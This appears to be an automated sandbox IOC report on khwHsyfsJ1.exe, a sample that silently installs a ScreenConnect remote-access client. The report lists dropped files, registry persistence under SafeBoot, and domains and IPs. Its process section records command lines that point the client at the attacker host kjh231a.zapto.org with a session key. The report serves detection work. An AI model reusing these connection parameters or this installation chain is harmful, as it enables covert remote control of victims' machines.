IOC Report
khwHsyfsJ1.exe

Files

File Path
Type
Category
Malicious
khwHsyfsJ1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_khwHsyfsJ1.exe_cedc721fedcefff4fd769557be0c6a9fb641d7_026cf9bc_01bbeda8-9df9-431d-b05b-aa7134e7ccfd\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x867a2d70, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F87.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER216C.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER21AC.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER21B9.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2208.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\1co5soej.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\62C6HAPT.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\ATCJGV5C.AJP\B8PVKCMA.Z7R.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\khwHsyfsJ1.exe
"C:\Users\user\Desktop\khwHsyfsJ1.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

URLs


Domains

Name
IP
Malicious
secure.stansup.com
79.110.49.185
kjh231a.zapto.org
79.110.49.185
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.34
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
79.110.49.185
secure.stansup.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)
NULL
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!01000000c375b60a14060000741b00000000000000000000055475cd9428db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd

Memdumps

Base Address
Regiontype
Protect
Malicious
heap
page read and write
189C5F5F000
heap
page read and write
1BE0F000
heap
page read and write
1D4572D8000
heap
page read and write
189C5613000
heap
page read and write
1E0EC90F000
heap
page read and write
1E0E7A15000
heap
page read and write
2726A950000
trusted library allocation
page read and write
189C5F6D000
heap
page read and write
2C40000
heap
page read and write
CBE000
stack
page read and write
3EBE000
stack
page read and write
1E0E7B13000
heap
page read and write
7FF888180000
trusted library allocation
page read and write
7FF888210000
trusted library allocation
page read and write
142B000
heap
page read and write
B638C7C000
stack
page read and write
3CD0000
trusted library allocation
page read and write
B63977E000
unkown
page readonly
12DBF000
trusted library allocation
page read and write
B63907E000
unkown
page readonly
7FF888060000
trusted library allocation
page read and write
7FF887E7C000
trusted library allocation
page execute and read and write
2726AF00000
heap
page read and write
7FF887FC0000
trusted library allocation
page read and write
189C647C000
heap
page read and write
B0E000
stack
page read and write
1D45AF90000
heap
page read and write
7FF887EE6000
trusted library allocation
page execute and read and write
5B5000
heap
page read and write
98327FA000
stack
page read and write
3CEA000
trusted library allocation
page read and write
7FF888030000
trusted library allocation
page read and write
189C5F10000
heap
page read and write
E30000
heap
page read and write
5530000
unkown
page readonly
98325FD000
stack
page read and write
10E3000
heap
page read and write
7FF888040000
trusted library allocation
page read and write
FF4000
unkown
page read and write
189C5E02000
